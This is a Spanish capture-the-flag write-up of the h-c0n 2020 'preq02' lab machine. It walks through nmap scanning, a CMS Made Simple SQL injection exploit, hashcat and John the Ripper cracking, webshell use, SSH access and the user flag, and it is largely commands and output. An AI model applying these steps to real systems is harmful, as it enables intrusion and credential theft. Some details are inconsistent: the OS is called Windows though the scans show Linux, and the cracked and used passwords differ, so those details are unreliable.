Machine es una máquina ubicada en h-c0n qualifier CTF que debemos vulnerar para conseguir las flags de usuario (user.txt) y root (root.txt) creada por iHackLabs basada en Windows OS, os mostraremos los pasos que hemos dado.
Autor: 1v4n a.k.a. @1r0Dm48O
Twitter: https://twitter.com/1r0Dm48O
{0x1} Reconocimiento
Y comprobamos que hay conexión con la máquina a vulnerar lanzado un ping -c 3 preq02.ihacklabs.com
{0x2} Escaneo
Realizamos un escaneo de puertos para comprobar los servicios que están abiertos y corriendo en la máquina a vulnerar con nmap -sS -sV preq02.ihacklabs.com -p- --script vuln
root@1v4n:~/CTF/hc0n2020# nmap -sS -sV preq02.ihacklabs.com -p- --script vuln Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-11 CET Nmap scan report for preq02.ihacklabs.com (54.36.134.34) Host is up (0.042s latency). rDNS record for 54.36.134.34: ip34.ip-54-36-134.eu Not shown: 65533 filtered ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u7 (protocol 2.0) |_clamav-exec: ERROR: Script execution failed (use -d to debug) 80/tcp open http Apache httpd 2.4.25 ((Debian)) |_clamav-exec: ERROR: Script execution failed (use -d to debug) | http-csrf: | Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=preq02.ihacklabs.com | Found the following possible CSRF vulnerabilities: | | Path: http://preq02.ihacklabs.com:80/manual/de/index.html | Form id: | Form action: http://www.google.com/search | | Path: http://preq02.ihacklabs.com:80/manual/ja/index.html | Form id: | Form action: http://www.google.com/search | | Path: http://preq02.ihacklabs.com:80/manual/pt-br/index.html | Form id: | Form action: http://www.google.com/search | | Path: http://preq02.ihacklabs.com:80/manual/zh-cn/index.html | Form id: | Form action: http://www.google.com/search | | Path: http://preq02.ihacklabs.com:80/manual/ko/index.html | Form id: | Form action: http://www.google.com/search | | Path: http://preq02.ihacklabs.com:80/manual/en/index.html | Form id: | Form action: http://www.google.com/search | | Path: http://preq02.ihacklabs.com:80/manual/fr/index.html | Form id: | Form action: http://www.google.com/search | | Path: http://preq02.ihacklabs.com:80/manual/tr/index.html | Form id: | Form action: http://www.google.com/search | | Path: http://preq02.ihacklabs.com:80/manual/es/index.html | Form id: | Form action: http://www.google.com/search | | Path: http://preq02.ihacklabs.com:80/manual/da/index.html | Form id: |_ Form action: http://www.google.com/search |_http-dombased-xss: Couldn't find any DOM based XSS. | http-enum: | /admin/login.php: Possible admin folder | /doc/: Potentially interesting folder | /lib/: Potentially interesting folder | /manual/: Potentially interesting folder | /modules/: Potentially interesting directory w/ listing on 'apache/2.4.25 (debian)' | /tmp/: Potentially interesting directory w/ listing on 'apache/2.4.25 (debian)' |_ /uploads/: Potentially interesting directory w/ listing on 'apache/2.4.25 (debian)' |_http-server-header: Apache/2.4.25 (Debian) |_http-stored-xss: Couldn't find any stored XSS vulnerabilities. | vulners: | cpe:/a:apache:http_server:2.4.25: | CVE-2017-7679 7.5 https://vulners.com/cve/CVE-2017-7679 | CVE-2017-7668 7.5 https://vulners.com/cve/CVE-2017-7668 | CVE-2017-3169 7.5 https://vulners.com/cve/CVE-2017-3169 | CVE-2017-3167 7.5 https://vulners.com/cve/CVE-2017-3167 | CVE-2019-0211 7.2 https://vulners.com/cve/CVE-2019-0211 | CVE-2018-1312 6.8 https://vulners.com/cve/CVE-2018-1312 | CVE-2017-15715 6.8 https://vulners.com/cve/CVE-2017-15715 | CVE-2019-10082 6.4 https://vulners.com/cve/CVE-2019-10082 | CVE-2017-9788 6.4 https://vulners.com/cve/CVE-2017-9788 | CVE-2019-0217 6.0 https://vulners.com/cve/CVE-2019-0217 | CVE-2019-10098 5.8 https://vulners.com/cve/CVE-2019-10098 | CVE-2019-10081 5.0 https://vulners.com/cve/CVE-2019-10081 | CVE-2019-0220 5.0 https://vulners.com/cve/CVE-2019-0220 | CVE-2019-0196 5.0 https://vulners.com/cve/CVE-2019-0196 | CVE-2018-17199 5.0 https://vulners.com/cve/CVE-2018-17199 | CVE-2018-1333 5.0 https://vulners.com/cve/CVE-2018-1333 | CVE-2017-9798 5.0 https://vulners.com/cve/CVE-2017-9798 | CVE-2017-7659 5.0 https://vulners.com/cve/CVE-2017-7659 | CVE-2017-15710 5.0 https://vulners.com/cve/CVE-2017-15710 | CVE-2019-0197 4.9 https://vulners.com/cve/CVE-2019-0197 | CVE-2019-10092 4.3 https://vulners.com/cve/CVE-2019-10092 | CVE-2018-11763 4.3 https://vulners.com/cve/CVE-2018-11763 |_ CVE-2018-1283 3.5 https://vulners.com/cve/CVE-2018-1283 Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 161.87 seconds |
Observamos abiertos los puertos con sus correspondientes servicios como el 22 (ssh) y 80 (http) con posibles vulnerabilidades.
{0x3} Enumeración
Nos centramos en el servicio http (80) enumerando directorios accesibles con la herramienta Dirhunt y detectamos que hospeda CMS Made Simple Version 2.2.5 - Wawa . Con una posible vulnerabilidad crítica de inyección SQL con el ID CVE-2019-9053 que fue puesta en conocimiento el 23/02/2019 y que el fabricante actualizó confirmando el 6/03/2019.
root@1v4n:~/CTF/hc0n2020# dirhunt http://preq02.ihacklabs.com/index.php Welcome to Dirhunt v0.6.0 using Python 3.7.5 [200] http://preq02.ihacklabs.com/ (HTML document) Index file found: index.php [301] http://preq02.ihacklabs.com/manual (Redirect) Redirect to: http://preq02.ihacklabs.com/manual/ [403] http://preq02.ihacklabs.com/icons/ (Generic) [200] http://preq02.ihacklabs.com/manual/ (HTML document) Index file found: index.html ... [200] http://preq02.ihacklabs.com/manual/es/ (HTML document) Index file found: index.html … [200] http://preq02.ihacklabs.com/manual/es/glossary.html (HTML document) Index file found: index.html … [200] http://preq02.ihacklabs.com/manual/es/sitemap.html (HTML document) Index file found: index.html … [200] http://preq02.ihacklabs.com/manual/es/mod/directives.html (HTML document) Index file found: index.html … [200] http://preq02.ihacklabs.com/manual/es/new_features_2_2.html (HTML document) Index file found: index.html ... [200] http://preq02.ihacklabs.com/manual/es/new_features_2_4.html (HTML document) Index file found: index.html … [200] http://preq02.ihacklabs.com/manual/es/new_features_2_0.html (HTML document) Index file found: index.html [200] http://preq02.ihacklabs.com/manual/es/license.html (HTML document) Index file found: index.html [200] http://preq02.ihacklabs.com/manual/es/upgrading.html (HTML document) Index file found: index.html [200] http://preq02.ihacklabs.com/manual/es/invoking.html (HTML document) Index file found: index.html … [200] http://preq02.ihacklabs.com/manual/es/stopping.html (HTML document) Index file found: index.html [200] http://preq02.ihacklabs.com/manual/es/install.html (HTML document) Index file found: index.html [200] http://preq02.ihacklabs.com/manual/es/mpm.html (HTML document) Index file found: index.html [200] http://preq02.ihacklabs.com/manual/es/filter.html (HTML document) Index file found: index.html [200] http://preq02.ihacklabs.com/manual/es/handler.html (HTML document) Index file found: index.html [200] http://preq02.ihacklabs.com/manual/es/getting-started.html (HTML document) Index file found: index.html … [200] http://preq02.ihacklabs.com/manual/es/expr.html (HTML document) Index file found: index.html [200] http://preq02.ihacklabs.com/manual/es/bind.html (HTML document) Index file found: index.html ... |
El exploit del CMS está disponible en EDB-ID 46635 publicado el 02/04/2019. Nos descargamos el exploit y lo ejecutamos contra el servicio CMS obteniendo las credenciales de admin con hashcat
[+] Salt for password found: da0834c2d528bc22 [+] Username found: admin [+] Email found: admin@mccd.es [*] Try: 91f237f9a5e2d049b5d948d8a097871c hashcat -m 20 91f237f9a5e2d049b5d948d8a097871c:da0834c2d528bc22 /usr/share/wordlists/rockyou.txt -o output.txt --force hashcat (v5.1.0) starting… ... Dictionary cache built: * Filename..: /usr/share/wordlists/rockyou.txt * Passwords.: 14344392 * Bytes.....: 139921507 * Keyspace..: 14344385 * Runtime...: 4 secs ... Session..........: hashcat Status...........: Cracked Hash.Type........: md5($salt.$pass) Hash.Target......: 91f237f9a5e2d049b5d948d8a097871c:da0834c2d528bc22 Time.Started.....: Sun Jan 12 01:49:28 2020 (1 sec) Time.Estimated...: Sun Jan 12 01:49:29 2020 (0 secs) Guess.Base.......: File (/usr/share/wordlists/rockyou.txt) Guess.Queue......: 1/1 (100.00%) Speed.#1.........: 8416 H/s (1.06ms) @ Accel:1024 Loops:1 Thr:1 Vec:8 Recovered........: 1/1 (100.00%) Digests, 1/1 (100.00%) Salts Progress.........: 2048/14344385 (0.01%) Rejected.........: 0/2048 (0.00%) Restore.Point....: 0/14344385 (0.00%) Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1 Candidates.#1....: 123456 -> lovers1 |
Observamos en el archivo output.txt la password del usuario admin y cuya password es lalala que son válidas y que nos da acceso al panel de administración de CMS
root@1v4n:~/CTF/hc0n2020/boot2root# ls -la total 24 drwxr-xr-x 2 root root 4096 ene 12 01:49 . drwxr-xr-x 6 root root 4096 ene 11 18:21 .. -rw-r--r-- 1 root root 3370 ene 11 23:50 44976.py -rw-r--r-- 1 root root 6385 ene 12 00:53 cve-2019-9053.py -rw------- 1 root root 57 ene 12 01:49 output.txt root@1v4n:~/CTF/hc0n2020/boot2root# cat output.txt 91f237f9a5e2d049b5d948d8a097871c:da0834c2d528bc22:lalala |
Una vez dentro del Panel de administración nos ayudamos de la PHP webshell B4TM4N SH3LL para extraer las clave privada id_rsa en el directorio /home/prequal/backup/id_rsa . Nos ayudamos de JtR para encontrar la credencial de acceso por el servicio de ssh perteneciente al usuario prequal.
root@1v4n:~/CTF/hc0n2020/boot2root# python /usr/share/john/ssh2john.py id_rsa > id_rsa.hash root@1v4n:~/CTF/hc0n2020/boot2root# john id_rsa.hash Using default input encoding: UTF-8 Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64]) Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes Cost 2 (iteration count) is 1 for all loaded hashes ... Proceeding with wordlist:/usr/share/john/password.lst, rules:Wordlist 12345678 (id_rsa) Proceeding with incremental:ASCII 12345678 (id_rsa) 2g 0:00:02:07 3/3 0.01570g/s 1216Kp/s 1216Kc/s 1216KC/s tumms31..tumml20 Session aborted ------------------ Pass 12345678 ----------------- |
{0x4} Acceso
Accedemos a la máquina con ssh -i id_rsa prequal@54.36.134.34 y la password 123456 con éxito. En el directorio /home/prequal/ y obtenemos la flag de user que está en el archivo local.txt
prequal@h-c0n_prequal:~$ id uid=1001(prequal) gid=1001(prequal) groups=1001(prequal) prequal@h-c0n_prequal:~$ pwd /home/prequal prequal@h-c0n_prequal:~$ ls -la total 44 drwxr-xr-x 5 prequal prequal 4096 Jan 10 02:05 . drwxr-xr-x 3 root root 4096 Dec 19 04:41 .. -rw------- 1 prequal prequal 118 Jan 10 02:05 .Xauthority -rw------- 1 prequal prequal 84 Jan 10 01:42 .bash_history -rw-r--r-- 1 prequal prequal 220 Dec 19 04:41 .bash_logout -rw-r--r-- 1 prequal prequal 3526 Dec 19 04:41 .bashrc drwxr-xr-x 2 prequal prequal 4096 Dec 19 04:45 .nano -rw-r--r-- 1 prequal prequal 675 Dec 19 04:41 .profile drwx------ 2 prequal prequal 4096 Jan 9 11:14 .ssh drwxr-xr-x 2 prequal prequal 4096 Jan 9 11:26 backup -rw------- 1 prequal prequal 40 Jan 9 04:09 local.txt prequal@h-c0n_prequal:~$ cat local.txt H-c0n{3ab7568bdae26ac11f6b9e14cad546f9} |
Y conseguimos tener acceso a local.txt > H-c0n{3ab7568bdae26ac11f6b9e14cad546f9}